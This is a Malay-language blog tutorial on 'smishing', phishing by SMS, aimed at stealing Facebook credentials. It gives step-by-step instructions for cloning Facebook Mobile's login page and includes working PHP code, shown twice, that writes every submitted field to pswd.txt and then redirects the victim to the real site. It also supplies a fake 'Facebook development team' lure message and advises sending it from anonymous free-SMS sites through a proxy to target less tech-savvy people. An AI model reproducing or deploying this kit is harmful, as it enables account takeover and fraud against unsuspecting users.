Kaedah Hacking Melalui SMS Phishing (Smishing)

Seni phishing nampaknya telah banyak berevolusi..dalam blog ini pun Hac telah menulis beberapa kaedah untuk melakukannya dan kebanyakan kaedah menjurus kepada cara untuk menggodam Facebook..

Dalam tutorial kali ini Hac akan memberikan satu cara untuk membuat SMS PHISHING atau Smishing..kaedah ini adalah kombinasi antara SMS dan phishing..
ia bukanlah benda baru tetapi kaedah ini boleh dikatakan masih relevan untuk digunakan kepada mereka yang kurang pengetahuan dalam ilmu IT..jadi mari sama-sama kita terjah tutorial ini!
(Entry ini seperti biasa akan membincangkan kaedah untuk hack Facebook)

p/s: kalau ada kesilapan dalam tutorial ini harap maaf lah yaaa...


'Perjalanan' Gerak Kerja Teknik Hacking Ini:


Seperti biasa, phishing jenis ini masih menggunakan 'fake login page' atau halaman log masuk palsu..cuma versi ini menggunakan telefon bimbit sebagai medium penyampaian maklumat..si mangsa akan menerima satu sms mengatakan ada versi baru dalam Facebook Mobile dan harus dicuba supaya tidak ketinggalan..

Apa yang diperlukan ialah web server yang dijalankan pada komputer anda dan disambungkan ke internet, serta nombor telefon bimbit sasaran..jangan tanya Mr.Hac bagaimana nak dapatkan web server ataupun perisiannya..
sila -----> GOOGLE..








Kaedah Membuat SMS Phishing a.k.a Smishing:


Pergi ke pautan Facebook Mobile dan salin serta simpan source codenya (klik kanan+View Page Source) pada komputer anda..buka fail tersebut dengan menggunakan notepad dan ubah code 'form method' daripada 'post' kepada 'get'..ubah nilai 'action' kepada write.php (nak letak nama lain pun boleh!)..namakan fail itu sebagai 'index.htm'..buat satu lagi fail dengan membuka notepad, salin code berikut dan simpankan ia, namakan sebagai 'write.php'..


<?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


atau boleh juga gunakan code ini:

header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");fclose($handle);
exit;?>



Buat juga satu lagi fail dari notepad dan namakannya sebagai pswd.txt..terus simpan tanpa mengubah apa-apa..




Penghantaran SMS:

Sila gunakan laman web penghantaran SMS percuma yang menghantar dengan menggunakan nombor mereka sendiri dan tidak perlukan pendaftaran (ni panduan supaya senang kerja!)..terdapat banyak laman seperti itu..seperti biasa, jangan tanya..sila GOOGLE..berikut adalah sedikit pratonton SMS yang akan dihantar:


Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://alamat-IP-anda/direktori-anda/
-Facebook development team.


Disarankan supaya anda gunakan proxy sebelum menghantar SMS tersebut..
Sedikit pesanan: berhati-hati apabila menjalankan server..

Ya..tutorial ini memang tidak lengkap..Mr.Hac ada tinggalkan satu lagi gerak kerja yang perlu anda cari sendiri iaitu cara untuk memuat naik fail-fail diatas ke dalam web server..sengaja Hac buat begitu supaya anda tahu nilai ilmu yang Hac sampaikan di sini..sekiranya ada kekeliruan, ada permasalahan (troubleshooting), atau ada kepala-kepala yang sakit akibat memikirkan caranya, maka carilah perlahan-lahan dan anda pasti akan jumpa jawapannya!




Powered by Blogger.